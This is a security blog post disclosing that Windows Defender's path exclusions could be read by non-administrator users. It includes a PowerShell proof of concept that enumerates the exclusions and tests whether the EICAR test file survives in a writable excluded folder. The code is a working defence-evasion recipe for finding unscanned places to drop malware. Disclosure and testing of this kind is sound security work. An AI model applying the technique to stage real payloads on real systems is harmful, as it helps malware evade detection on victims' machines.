Dear Windows Defender, please tell me where I can drop my malicious code. Simone Aonzo, Mar 24

The Get-MpPreference PowerShell cmdlet exposes the ExclusionPath field, the list of paths Windows Defender skips when scanning, to any user, without administrator privilege. (Microsoft has since restricted this: on newer Defender builds a non-administrator sees only a placeholder string such as "N/A: Must be an administrator to view exclusions" instead of the list.)

Why does this matter? An attacker running as a standard user can trivially find out whether any folders are excluded from Windows Defender scanning, and which ones.

For example, they can read this field, look for an excluded folder that their account can write to, and drop the next stage of their malware there without it ever being scanned.

Do you want a POC? Here we go.

Exclude a folder in the Windows Security scan settings. Then open a Command Prompt in any user session (not elevated, obviously) and run the following command, which downloads and executes a PowerShell script:

The PowerShell script "ExploitDefenderExclusionPOC.ps1" reads ExclusionPath and tries to drop the EICAR test file into each listed folder. If it finds a folder it can write to, the file stays on disk: real-time protection never looks at it, so a real payload dropped the same way would go unnoticed by Windows Defender.
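The same procedure, written out as an added example (this is not the author's ExploitDefenderExclusionPOC.ps1, whose contents the post does not show). It assumes the Defender PowerShell module is present so that Get-MpPreference works, skips wildcard and file exclusions because only a plain directory can be written into, and stops early if Defender returns the administrator-only placeholder instead of a path list. The EICAR string is the standard, harmless antivirus test signature; it is written with single quotes so PowerShell does not try to expand `$EICAR` and `$H`.

```powershell
# Added example, not the original POC script: list Defender path exclusions as a
# standard user, find one this account can write to, and confirm that the EICAR
# test file survives there (a scanned folder would have it quarantined).
# Assumption: Get-MpPreference is available (Defender module installed).

# Harmless AV test string (EICAR). Single quotes: no variable expansion.
$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

$exclusions = (Get-MpPreference).ExclusionPath
# Newer builds hide exclusions from non-admins and return an "N/A: ..." string.
if (-not $exclusions -or ($exclusions -join '') -like 'N/A:*') {
    Write-Host 'No path exclusions visible to this user.'
    return
}

$dropped = $null
foreach ($raw in $exclusions) {
    # Exclusions may be written with environment variables; expand them first.
    $path = [Environment]::ExpandEnvironmentVariables($raw)

    # Skip wildcard patterns and single-file exclusions: we need a real directory.
    if ($path -match '[\*\?]' -or -not (Test-Path -LiteralPath $path -PathType Container)) {
        Write-Host "Skipping (not a plain directory): $raw"
        continue
    }

    # Random file name so repeated runs do not collide with a quarantined leftover.
    $file = Join-Path $path ('eicar_' + [guid]::NewGuid().ToString('N') + '.com')
    try {
        # ASCII, no trailing newline: the bytes then match the EICAR specification.
        Set-Content -LiteralPath $file -Value $eicar -Encoding Ascii -NoNewline -ErrorAction Stop
    } catch {
        Write-Host "Not writable by this user: $path"
        continue
    }

    # Give real-time protection a moment; in a scanned folder the file disappears.
    Start-Sleep -Seconds 5
    if (Test-Path -LiteralPath $file) {
        Write-Host "Writable and unscanned: $file"
        $dropped = $file
        break
    } else {
        Write-Host "Written but removed by Defender, exclusion not effective: $path"
    }
}

# Clean up the test file so the exclusion does not keep an EICAR sample around.
if ($dropped) { Remove-Item -LiteralPath $dropped -Force }
```

Run it from an ordinary, non-elevated PowerShell session. The survival check after the sleep is the part worth keeping: an entry in ExclusionPath only tells you what Defender is configured to skip, while a file that is still there five seconds after being written tells you the exclusion is actually in effect for that folder.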